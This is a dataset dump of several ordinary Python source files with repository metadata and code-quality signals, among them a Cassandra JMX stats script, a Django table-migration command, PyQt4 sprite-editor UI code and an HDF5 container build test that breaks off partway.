hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5a7fe776654c20e1290bc4e948072b1dcc063b7e | 2,007 | py | Python | util/query_jmx.py | perfsonar/esmond | 391939087321c1438d54cdadee3eb936b95f3e92 | [
"BSD-3-Clause-LBNL"
] | 3 | 2019-10-23T01:10:19.000Z | 2022-03-26T18:40:44.000Z | util/query_jmx.py | perfsonar/esmond | 391939087321c1438d54cdadee3eb936b95f3e92 | [
"BSD-3-Clause-LBNL"
] | 23 | 2018-12-05T20:30:04.000Z | 2020-11-11T19:20:57.000Z | util/query_jmx.py | perfsonar/esmond | 391939087321c1438d54cdadee3eb936b95f3e92 | [
"BSD-3-Clause-LBNL"
] | 3 | 2019-02-11T20:40:41.000Z | 2022-03-26T18:40:50.000Z | #!/usr/bin/env python3
"""
Code to issue calls to the cassandra MX4J http server and get stats.
"""
import os
import sys
from optparse import OptionParser
from esmond.api.client.jmx import CassandraJMX
def main():
usage = '%prog [ -U ]'
parser = OptionParser(usage=usage)
parser.add_option('-U', '--url', metavar='URL',
type='string', dest='url', default='http://localhost:8081',
help='URL:port to cassandra mx4j server (default=%default).')
parser.add_option('-v', '--verbose',
dest='verbose', action='count', default=False,
help='Verbose output - -v, -vv, etc.')
options, args = parser.parse_args()
cjmx = CassandraJMX(options.url)
print('Heap mem:', cjmx.get_heap_memory())
print('Non-heap mem:', cjmx.get_non_heap_memory())
print('Read latency:', cjmx.get_read_latency())
print('Write latency:', cjmx.get_write_latency())
print('Range latency:', cjmx.get_range_latency())
print('GC count:', cjmx.get_gc_count())
print('GC time:', cjmx.get_gc_time())
print('Active read tasks:', cjmx.get_read_active())
print('Pending read tasks:', cjmx.get_read_pending())
print('Completed read tasks:', cjmx.get_read_completed())
print('Active write tasks:', cjmx.get_write_active())
print('Pending write tasks:', cjmx.get_write_pending())
print('Completed write tasks:',cjmx.get_write_completed())
print('Active gossip tasks:', cjmx.get_gossip_active())
print('Pending gossip tasks:', cjmx.get_gossip_pending())
print('Completed gossip tasks:',cjmx.get_gossip_completed())
print('OS load:', cjmx.get_os_load())
print('OS free mem:', cjmx.get_os_free_memory())
print('OS free swap:', cjmx.get_os_free_swap())
print('OS committed virtual mem:', cjmx.get_os_committed_virtual_memory())
print('Pending compaction', cjmx.get_compaction_pending())
print('Completed compaction', cjmx.get_compaction_complete())
if __name__ == '__main__':
main()
| 38.596154 | 78 | 0.678127 | 268 | 2,007 | 4.854478 | 0.30597 | 0.11837 | 0.083013 | 0.036895 | 0.152191 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004179 | 0.165421 | 2,007 | 51 | 79 | 39.352941 | 0.772537 | 0.044843 | 0 | 0 | 0 | 0 | 0.275013 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025641 | false | 0 | 0.102564 | 0 | 0.128205 | 0.564103 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
5a8074c85da0b1531e270b6b0eaa82126e705010 | 1,294 | py | Python | apps/accounts/management/commands/amend_hostingproviders_stats.py | BR0kEN-/admin-portal | 0c38dc0d790031f45bf07660bce690e972fe2858 | [
"Apache-2.0"
] | null | null | null | apps/accounts/management/commands/amend_hostingproviders_stats.py | BR0kEN-/admin-portal | 0c38dc0d790031f45bf07660bce690e972fe2858 | [
"Apache-2.0"
] | null | null | null | apps/accounts/management/commands/amend_hostingproviders_stats.py | BR0kEN-/admin-portal | 0c38dc0d790031f45bf07660bce690e972fe2858 | [
"Apache-2.0"
] | null | null | null | from django.core.management.base import BaseCommand
from django.db import connection
class Command(BaseCommand):
help = "Add missing id column for hostingstats."
def handle(self, *args, **options):
with connection.cursor() as cursor:
self.cursor = cursor
self.cursor.execute(
"""
START TRANSACTION;
CREATE TABLE `hostingproviders_stats_copy` (
`id` INT(11) primary key Not null auto_increment,
`id_hp` Int( 11 ) NOT NULL,
`green_checks` Int( 11 ) NOT NULL,
`green_domains` Int( 11 ) NOT NULL,
CONSTRAINT `id_hp` UNIQUE( `id_hp` ) )
CHARACTER SET = latin1
COLLATE = latin1_swedish_ci
ENGINE = InnoDB;
-------------------------------------------------------------
INSERT into hostingproviders_stats_copy(id_hp, green_checks, green_domains)
SELECT id_hp, green_checks, green_domains FROM hostingproviders_stats;
DROP table hostingproviders_stats;
ALTER table hostingproviders_stats_copy rename to hostingproviders_stats;
COMMIT;
"""
)
| 38.058824 | 91 | 0.532457 | 122 | 1,294 | 5.459016 | 0.52459 | 0.189189 | 0.117117 | 0.054054 | 0.132132 | 0.081081 | 0 | 0 | 0 | 0 | 0 | 0.012048 | 0.358578 | 1,294 | 33 | 92 | 39.212121 | 0.790361 | 0 | 0 | 0 | 0 | 0 | 0.111429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
5a81a24952b6eed80c202bd9ff7db7e295855534 | 2,088 | py | Python | piece.py | brouxco/quarto-solver | 12ae87f43d4a80137cb4394de9c399d8f9894da3 | [
"0BSD"
] | null | null | null | piece.py | brouxco/quarto-solver | 12ae87f43d4a80137cb4394de9c399d8f9894da3 | [
"0BSD"
] | null | null | null | piece.py | brouxco/quarto-solver | 12ae87f43d4a80137cb4394de9c399d8f9894da3 | [
"0BSD"
] | null | null | null | class Piece(object):
def __init__(self,
is_tall: bool = True,
is_dark: bool = True,
is_square: bool = True,
is_solid: bool = True,
string: str = None):
if string:
self.is_tall = (string[0] == "1")
self.is_dark = (string[1] == "1")
self.is_square = (string[2] == "1")
self.is_solid = (string[3] == "1")
else:
self.is_tall = is_tall
self.is_dark = is_dark
self.is_square = is_square
self.is_solid = is_solid
def __str__(self):
return "{0}{1}{2}{3}".format(
'1' if self.is_tall else '0',
'1' if self.is_dark else '0',
'1' if self.is_square else '0',
'1' if self.is_solid else '0'
)
def __hash__(self):
res = 0
res += 1 if self.is_tall else 0
res += 2 if self.is_dark else 0
res += 4 if self.is_square else 0
res += 8 if self.is_solid else 0
return res
def __eq__(self, other_piece):
if not isinstance(other_piece, type(self)):
return False
return self.__hash__() == other_piece.__hash__()
def has_in_common_with(self, *other_pieces):
all_pieces_are_as_tall = True
all_pieces_are_as_dark = True
all_pieces_are_as_square = True
all_pieces_are_as_solid = True
for p in other_pieces:
if not(self.is_tall == p.is_tall):
all_pieces_are_as_tall = False
if not(self.is_dark == p.is_dark):
all_pieces_are_as_dark = False
if not(self.is_square == p.is_square):
all_pieces_are_as_square = False
if not(self.is_solid == p.is_solid):
all_pieces_are_as_solid = False
return (all_pieces_are_as_tall
or all_pieces_are_as_dark
or all_pieces_are_as_square
or all_pieces_are_as_solid)
if __name__ == "__main__":
pass
| 32.625 | 56 | 0.531609 | 289 | 2,088 | 3.425606 | 0.16609 | 0.127273 | 0.145455 | 0.169697 | 0.442424 | 0.148485 | 0.036364 | 0 | 0 | 0 | 0 | 0.022256 | 0.375958 | 2,088 | 63 | 57 | 33.142857 | 0.737529 | 0 | 0 | 0 | 0 | 0 | 0.015326 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.018182 | 0 | 0.018182 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5a898eeb8ca1914311a3bfe38f233e0ef651e459 | 497 | py | Python | src/test/model/test_node.py | AstrorEnales/GenCoNet | c596d31a889f14499883fcdf74fdc67f927a806e | [
"MIT"
] | 2 | 2019-12-05T11:46:48.000Z | 2022-03-09T00:11:06.000Z | src/test/model/test_node.py | AstrorEnales/GenCoNet | c596d31a889f14499883fcdf74fdc67f927a806e | [
"MIT"
] | null | null | null | src/test/model/test_node.py | AstrorEnales/GenCoNet | c596d31a889f14499883fcdf74fdc67f927a806e | [
"MIT"
] | null | null | null | import unittest
from model import node
class DummyNode(node.Node):
def __init__(self, ids: [str], names: [str]):
super().__init__(ids, names)
self.primary_id_prefix = 'TEST'
class TestMethods(unittest.TestCase):
def test_label(self):
n = DummyNode([], [])
self.assertEqual(n.label, 'DummyNode')
def test_str(self):
n = DummyNode(['TEST:1'], ['test name'])
self.assertEqual(str(n), 'DummyNode={ids: [TEST:1], names: ["test name"]}')
| 26.157895 | 83 | 0.615694 | 62 | 497 | 4.741935 | 0.403226 | 0.102041 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005128 | 0.215292 | 497 | 18 | 84 | 27.611111 | 0.748718 | 0 | 0 | 0 | 0 | 0 | 0.150905 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.230769 | false | 0 | 0.153846 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce4d63008769bb7f26121f3ebe84e27bc4d39e53 | 7,853 | py | Python | tools/sprite-editor/gui/direction_sprite_widget.py | jordsti/stigame | 6ac0ae737667b1c77da3ef5007f5c4a3a080045a | [
"MIT"
] | 8 | 2015-02-03T20:23:49.000Z | 2022-02-15T07:51:05.000Z | tools/sprite-editor/gui/direction_sprite_widget.py | jordsti/stigame | 6ac0ae737667b1c77da3ef5007f5c4a3a080045a | [
"MIT"
] | null | null | null | tools/sprite-editor/gui/direction_sprite_widget.py | jordsti/stigame | 6ac0ae737667b1c77da3ef5007f5c4a3a080045a | [
"MIT"
] | 2 | 2017-02-13T18:04:00.000Z | 2020-08-24T03:21:37.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'direction_sprite_widget.ui'
#
# Created: Wed Jul 30 18:37:40 2014
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_direction_sprite_widget(object):
def setupUi(self, direction_sprite_widget):
direction_sprite_widget.setObjectName(_fromUtf8("direction_sprite_widget"))
direction_sprite_widget.resize(566, 457)
self.verticalLayoutWidget = QtGui.QWidget(direction_sprite_widget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 561, 451))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.layout_main = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.layout_main.setMargin(5)
self.layout_main.setObjectName(_fromUtf8("layout_main"))
self.layout_sprite_info = QtGui.QHBoxLayout()
self.layout_sprite_info.setMargin(2)
self.layout_sprite_info.setObjectName(_fromUtf8("layout_sprite_info"))
self.gb_sprite = QtGui.QGroupBox(self.verticalLayoutWidget)
self.gb_sprite.setMinimumSize(QtCore.QSize(250, 110))
self.gb_sprite.setObjectName(_fromUtf8("gb_sprite"))
self.formLayoutWidget = QtGui.QWidget(self.gb_sprite)
self.formLayoutWidget.setGeometry(QtCore.QRect(20, 20, 191, 74))
self.formLayoutWidget.setObjectName(_fromUtf8("formLayoutWidget"))
self.formLayout = QtGui.QFormLayout(self.formLayoutWidget)
self.formLayout.setMargin(0)
self.formLayout.setObjectName(_fromUtf8("formLayout"))
self.lbl_name = QtGui.QLabel(self.formLayoutWidget)
self.lbl_name.setObjectName(_fromUtf8("lbl_name"))
self.formLayout.setWidget(0, QtGui.QFormLayout.LabelRole, self.lbl_name)
self.le_name = QtGui.QLineEdit(self.formLayoutWidget)
self.le_name.setObjectName(_fromUtf8("le_name"))
self.formLayout.setWidget(0, QtGui.QFormLayout.FieldRole, self.le_name)
self.lbl_width = QtGui.QLabel(self.formLayoutWidget)
self.lbl_width.setObjectName(_fromUtf8("lbl_width"))
self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.lbl_width)
self.le_width = QtGui.QLineEdit(self.formLayoutWidget)
self.le_width.setObjectName(_fromUtf8("le_width"))
self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.le_width)
self.lbl_height = QtGui.QLabel(self.formLayoutWidget)
self.lbl_height.setObjectName(_fromUtf8("lbl_height"))
self.formLayout.setWidget(2, QtGui.QFormLayout.LabelRole, self.lbl_height)
self.le_height = QtGui.QLineEdit(self.formLayoutWidget)
self.le_height.setObjectName(_fromUtf8("le_height"))
self.formLayout.setWidget(2, QtGui.QFormLayout.FieldRole, self.le_height)
self.layout_sprite_info.addWidget(self.gb_sprite)
self.gb_preview = QtGui.QGroupBox(self.verticalLayoutWidget)
self.gb_preview.setMinimumSize(QtCore.QSize(120, 0))
self.gb_preview.setObjectName(_fromUtf8("gb_preview"))
self.horizontalLayoutWidget = QtGui.QWidget(self.gb_preview)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(10, 20, 121, 80))
self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
self.layout_preview = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.layout_preview.setMargin(0)
self.layout_preview.setObjectName(_fromUtf8("layout_preview"))
self.lbl_preview = QtGui.QLabel(self.horizontalLayoutWidget)
self.lbl_preview.setObjectName(_fromUtf8("lbl_preview"))
self.layout_preview.addWidget(self.lbl_preview)
self.sp_fps = QtGui.QSpinBox(self.horizontalLayoutWidget)
self.sp_fps.setMinimumSize(QtCore.QSize(40, 20))
self.sp_fps.setMaximumSize(QtCore.QSize(40, 20))
self.sp_fps.setMinimum(15)
self.sp_fps.setMaximum(150)
self.sp_fps.setObjectName(_fromUtf8("sp_fps"))
self.layout_preview.addWidget(self.sp_fps)
self.layout_sprite_info.addWidget(self.gb_preview)
self.btn_add_frame = QtGui.QPushButton(self.verticalLayoutWidget)
self.btn_add_frame.setMinimumSize(QtCore.QSize(120, 0))
self.btn_add_frame.setObjectName(_fromUtf8("btn_add_frame"))
self.layout_sprite_info.addWidget(self.btn_add_frame)
self.layout_main.addLayout(self.layout_sprite_info)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.lbl_frames = QtGui.QLabel(self.verticalLayoutWidget)
self.lbl_frames.setObjectName(_fromUtf8("lbl_frames"))
self.horizontalLayout.addWidget(self.lbl_frames)
self.formLayout_2 = QtGui.QFormLayout()
self.formLayout_2.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout_2.setObjectName(_fromUtf8("formLayout_2"))
self.cb_direction = QtGui.QComboBox(self.verticalLayoutWidget)
self.cb_direction.setObjectName(_fromUtf8("cb_direction"))
self.formLayout_2.setWidget(0, QtGui.QFormLayout.FieldRole, self.cb_direction)
self.lbl_direction = QtGui.QLabel(self.verticalLayoutWidget)
self.lbl_direction.setObjectName(_fromUtf8("lbl_direction"))
self.formLayout_2.setWidget(0, QtGui.QFormLayout.LabelRole, self.lbl_direction)
self.horizontalLayout.addLayout(self.formLayout_2)
self.layout_main.addLayout(self.horizontalLayout)
self.sa_frames = QtGui.QScrollArea(self.verticalLayoutWidget)
self.sa_frames.setWidgetResizable(True)
self.sa_frames.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignVCenter)
self.sa_frames.setObjectName(_fromUtf8("sa_frames"))
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 549, 289))
self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
self.sa_frames.setWidget(self.scrollAreaWidgetContents)
self.layout_main.addWidget(self.sa_frames)
self.retranslateUi(direction_sprite_widget)
QtCore.QMetaObject.connectSlotsByName(direction_sprite_widget)
def retranslateUi(self, direction_sprite_widget):
direction_sprite_widget.setWindowTitle(_translate("direction_sprite_widget", "Form", None))
self.gb_sprite.setTitle(_translate("direction_sprite_widget", "Sprite Information", None))
self.lbl_name.setText(_translate("direction_sprite_widget", "Name :", None))
self.lbl_width.setText(_translate("direction_sprite_widget", "Width :", None))
self.le_width.setText(_translate("direction_sprite_widget", "0", None))
self.lbl_height.setText(_translate("direction_sprite_widget", "Height :", None))
self.le_height.setText(_translate("direction_sprite_widget", "0", None))
self.gb_preview.setTitle(_translate("direction_sprite_widget", "Preview", None))
self.lbl_preview.setText(_translate("direction_sprite_widget", "P", None))
self.btn_add_frame.setText(_translate("direction_sprite_widget", "Add a frame...", None))
self.lbl_frames.setText(_translate("direction_sprite_widget", "Frame(s)", None))
self.lbl_direction.setText(_translate("direction_sprite_widget", "Direction :", None))
| 58.17037 | 99 | 0.741118 | 879 | 7,853 | 6.375427 | 0.166098 | 0.09743 | 0.086188 | 0.06424 | 0.365096 | 0.274268 | 0.154889 | 0.063526 | 0.029265 | 0.029265 | 0 | 0.020574 | 0.152044 | 7,853 | 134 | 100 | 58.604478 | 0.820994 | 0.029033 | 0 | 0.05042 | 1 | 0 | 0.090861 | 0.045299 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042017 | false | 0 | 0.008403 | 0.02521 | 0.084034 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce53b07d3a1a59be1abb2c6bf2cf0cd25eb7f425 | 562 | py | Python | scripts/show_by_content_type.py | b-cube/Response-Identification-Info | d2fa24c9f0d7db7d8bbf5cda937e1a9dd29a8f6e | [
"MIT"
] | null | null | null | scripts/show_by_content_type.py | b-cube/Response-Identification-Info | d2fa24c9f0d7db7d8bbf5cda937e1a9dd29a8f6e | [
"MIT"
] | 1 | 2015-09-23T16:30:34.000Z | 2015-09-23T16:30:34.000Z | scripts/show_by_content_type.py | b-cube/Response-Identification-Info | d2fa24c9f0d7db7d8bbf5cda937e1a9dd29a8f6e | [
"MIT"
] | 1 | 2020-03-25T09:41:03.000Z | 2020-03-25T09:41:03.000Z | import os
import glob
import json
for f in glob.glob('/Users/sparky/Documents/solr_responses/solr_20150922_docs/*.json'):
with open(f, 'r') as g:
data = json.loads(g.read())
headers = data.get('response_headers', [])
if not headers:
continue
headers = dict(
(k.strip().lower(), v.strip()) for k, v in (h.split(':', 1) for h in headers)
)
content_type = headers.get('content-type', '')
if content_type and 'shockwave' in content_type:
print data.get('url'), content_type, data.get('tstamp')
| 28.1 | 87 | 0.617438 | 81 | 562 | 4.185185 | 0.530864 | 0.162242 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020737 | 0.227758 | 562 | 19 | 88 | 29.578947 | 0.760369 | 0 | 0 | 0 | 0 | 0 | 0.199288 | 0.113879 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.2 | null | null | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce5f3e28692a3faeaa82556c686295cb266a77ee | 300 | py | Python | src/utils/regex_utils/regex_utils.py | BichengWang/python-notebook | 83fae37432a2bf701566e85ab6d7e8e3d688a0ee | [
"MIT"
] | null | null | null | src/utils/regex_utils/regex_utils.py | BichengWang/python-notebook | 83fae37432a2bf701566e85ab6d7e8e3d688a0ee | [
"MIT"
] | null | null | null | src/utils/regex_utils/regex_utils.py | BichengWang/python-notebook | 83fae37432a2bf701566e85ab6d7e8e3d688a0ee | [
"MIT"
] | null | null | null | import re
def find_indices():
return [m.start(0) for m in re.finditer(reg, content)]
def find_content():
return re.findall(reg, content)
if __name__ == "__main__":
content = 'an example word:cat and word:dog'
reg = r'word:\w'
print(find_indices())
print(find_content())
| 17.647059 | 58 | 0.653333 | 45 | 300 | 4.088889 | 0.6 | 0.076087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004202 | 0.206667 | 300 | 16 | 59 | 18.75 | 0.768908 | 0 | 0 | 0 | 0 | 0 | 0.156667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0.2 | 0.5 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
ce6649c4f6c16cf45f7213f96f05b37dd34d751f | 4,936 | py | Python | test/test_hdf5.py | gonzalobg/hpc-container-maker | dd5486c3fbb0fce38d825173022908ef0f96f77e | [
"Apache-2.0"
] | 1 | 2021-01-04T00:29:22.000Z | 2021-01-04T00:29:22.000Z | test/test_hdf5.py | gonzalobg/hpc-container-maker | dd5486c3fbb0fce38d825173022908ef0f96f77e | [
"Apache-2.0"
] | null | null | null | test/test_hdf5.py | gonzalobg/hpc-container-maker | dd5486c3fbb0fce38d825173022908ef0f96f77e | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=invalid-name, too-few-public-methods, bad-continuation
"""Test cases for the hdf5 module"""
from __future__ import unicode_literals
from __future__ import print_function
import logging # pylint: disable=unused-import
import unittest
from helpers import centos, docker, ubuntu
from hpccm.building_blocks.hdf5 import hdf5
class Test_hdf5(unittest.TestCase):
def setUp(self):
"""Disable logging output messages"""
logging.disable(logging.ERROR)
@ubuntu
@docker
def test_defaults_ubuntu(self):
"""Default hdf5 building block"""
h = hdf5()
self.assertEqual(str(h),
r'''# HDF5 version 1.10.6
RUN apt-get update -y && \
DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
bzip2 \
file \
make \
wget \
zlib1g-dev && \
rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp http://www.hdfgroup.org/ftp/HDF5/releases/hdf5-1.10/hdf5-1.10.6/src/hdf5-1.10.6.tar.bz2 && \
mkdir -p /var/tmp && tar -x -f /var/tmp/hdf5-1.10.6.tar.bz2 -C /var/tmp -j && \
cd /var/tmp/hdf5-1.10.6 && ./configure --prefix=/usr/local/hdf5 --enable-cxx --enable-fortran && \
make -j$(nproc) && \
make -j$(nproc) install && \
rm -rf /var/tmp/hdf5-1.10.6 /var/tmp/hdf5-1.10.6.tar.bz2
ENV CPATH=/usr/local/hdf5/include:$CPATH \
HDF5_DIR=/usr/local/hdf5 \
LD_LIBRARY_PATH=/usr/local/hdf5/lib:$LD_LIBRARY_PATH \
LIBRARY_PATH=/usr/local/hdf5/lib:$LIBRARY_PATH \
PATH=/usr/local/hdf5/bin:$PATH''')
@centos
@docker
def test_defaults_centos(self):
"""Default hdf5 building block"""
h = hdf5()
self.assertEqual(str(h),
r'''# HDF5 version 1.10.6
RUN yum install -y \
bzip2 \
file \
make \
wget \
zlib-devel && \
rm -rf /var/cache/yum/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp http://www.hdfgroup.org/ftp/HDF5/releases/hdf5-1.10/hdf5-1.10.6/src/hdf5-1.10.6.tar.bz2 && \
